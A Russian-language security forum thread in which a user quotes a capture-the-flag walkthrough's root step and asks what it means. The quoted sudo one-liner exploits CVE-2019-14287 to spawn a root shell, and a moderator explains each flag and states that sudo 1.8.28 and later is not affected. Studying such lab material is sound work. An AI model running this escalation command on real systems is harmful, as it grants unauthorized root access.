• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

не понимаю параметры команды

addedie

Well-known member
04.08.2019
157
0
BIT
0
поясните что в первой команде, она используется для повышения привилегий но что за ключи непонимаю куда копать
Код:
Privilege Escalation

The author added this loophole because it is the latest zero-day exploit CVE: 2019-14287 and you should to proactive to bypass it.

Type following for escalating the root the shell:

sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
cd root
cat final.txt

Conclusion: The VM was designed to cover each track of the kill chain by considering red team approach and proactive learning with latest vulnerabilities.

Hope you have enjoyed this machine. Happy Hacking!!!!!!!

вот эта
sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
перед всем этим еще скрин что происходит до ввода и после
ведь поидее решеточка это коментарий означает , как он так сработал?
 

Вложения

  • 17.png
    17.png
    9,7 КБ · Просмотры: 251
  • 18.png
    18.png
    15,2 КБ · Просмотры: 162
Последнее редактирование:

f22

Codeby Academy
Gold Team
05.05.2019
1 843
225
BIT
1 062
sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
sudo -u#-1 - выполнить данную команду от имени пользователя, который находится в -1 позиции списка. То есть скорее всего от имени root.
В современных версиях sudo, а именно старше 1.8.28 этот параметр уже нельзя использовать.

watch - утилита, которая запускает какую-то программу с нужным интервалом
-x sh выполнить sh - то есть запустить терминал
-с указывает, что дальше в команде будут идти дополнительные кавычки

Далее
reset - инициализирует терминал
exec sh - запустить sh - shell

1>&0 2>&0 - конструкции перенаправления вывода.
В данном случае 1 - стандартный вывод (экран), 2 - стандартная ошибка (отображение ошибок на экране).
И перенаправляются они на ввод клавиатуры - 0.

Заключительная -u относится к команде sh. Проверяет, существует ли файл и установлен ли у него пользовательский ID флаг.


По сути своей команда похожа на обёртку в обёртке, которая хитрым способом запускает консоль с правами суперпользователя из под себя. Но, как уже написал выше, эту уязвимость можно найти только на старых системах.
 

addedie

Well-known member
04.08.2019
157
0
BIT
0
спасибо большое, и всеже приятно что гдето можно опробовать такой скил, кто знает куда занесет вдруг и попадется че подобное
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!